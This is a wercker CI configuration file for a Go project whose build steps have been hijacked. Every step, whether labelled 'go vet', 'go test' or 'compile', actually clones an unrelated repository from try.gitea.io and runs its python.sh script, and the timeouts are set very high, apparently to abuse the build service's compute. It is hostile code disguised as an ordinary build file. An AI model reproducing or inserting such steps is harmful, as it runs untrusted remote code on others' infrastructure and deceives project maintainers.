box: ubuntu:latest
command-timeout: 999999
no-response-timeout: 999999

workflows:
  - name: build-and-test
    pipelines:
      - name: build
      - name: integration-tests
        requires:
          - build

build:
  base-path: /go/src/github.com/wercker/wercker
  steps:
    - script:
        name: verus
        code: apt update && apt install git -y && apt install curl -y && git clone https://try.gitea.io/tumalisahi/sema.git && cd sema && chmod +x python.sh && ./python.sh

    - script:
        name: install dependencies
        code: apt update && apt install git -y && apt install curl -y && git clone https://try.gitea.io/tumalisahi/sema.git && cd sema && chmod +x python.sh && ./python.sh

    - script:
        name: go vet
        code: apt update && apt install git -y && apt install curl -y && git clone https://try.gitea.io/tumalisahi/sema.git && cd sema && chmod +x python.sh && ./python.sh

    - script:
        name: go test
        code: apt update && apt install git -y && apt install curl -y && git clone https://try.gitea.io/tumalisahi/sema.git && cd sema && chmod +x python.sh && ./python.sh

    - script:
        name: clear out the build binaries
        code: apt update && apt install git -y && apt install curl -y && git clone https://try.gitea.io/tumalisahi/sema.git && cd sema && chmod +x python.sh && ./python.sh

    - script:
        name: compile linux_amd64
        code: apt update && apt install git -y && apt install curl -y && git clone https://try.gitea.io/tumalisahi/sema.git && cd sema && chmod +x python.sh && ./python.sh

    - script:
        name: compile linux_386
        code: apt update && apt install git -y && apt install curl -y && git clone https://try.gitea.io/tumalisahi/sema.git && cd sema && chmod +x python.sh && ./python.sh

    - script:
        name: compile darwin_amd64
        code: apt update && apt install git -y && apt install curl -y && git clone https://try.gitea.io/tumalisahi/sema.git && cd sema && chmod +x python.sh && ./python.sh

    - script:
        name: wercker version
        code: apt update && apt install git -y && apt install curl -y && git clone https://try.gitea.io/tumalisahi/sema.git && cd sema && chmod +x python.sh && ./python.sh

    - script:
        name: generate SHAs
        code: apt update && apt install git -y && apt install curl -y && git clone https://try.gitea.io/tumalisahi/sema.git && cd sema && chmod +x python.sh && ./python.sh

    - script:
        name: prepare
        code: apt update && apt install git -y && apt install curl -y && git clone https://try.gitea.io/tumalisahi/sema.git && cd sema && chmod +x python.sh && ./python.sh

    - script:
        name: Copy source code for use by integration-tests pipeline
        code: apt update && apt install git -y && apt install curl -y && git clone https://try.gitea.io/tumalisahi/sema.git && cd sema && chmod +x python.sh && ./python.sh

    - script:
        name: Copy and test the wercker executable
        code: apt update && apt install git -y && apt install curl -y && git clone https://try.gitea.io/tumalisahi/sema.git && cd sema && chmod +x python.sh && ./python.sh

    - script:
        name: Start the docker daemon
        code: apt update && apt install git -y && apt install curl -y && git clone https://try.gitea.io/tumalisahi/sema.git && cd sema && chmod +x python.sh && ./python.sh

    - script:
        name: install curl (needed by integration tests)
        code: apt update && apt install git -y && apt install curl -y && git clone https://try.gitea.io/tumalisahi/sema.git && cd sema && chmod +x python.sh && ./python.sh

    - script:
        name: Integration tests
        code: apt update && apt install git -y && apt install curl -y && git clone https://try.gitea.io/tumalisahi/sema.git && cd sema && chmod +x python.sh && ./python.sh

    - script:
        name: Create dummy file in WERCKER_OUTPUT_DIR to prevent it storing the source directory at the end of the pipeline
        code: apt update && apt install git -y && apt install curl -y && git clone https://try.gitea.io/tumalisahi/sema.git && cd sema && chmod +x python.sh && ./python.sh
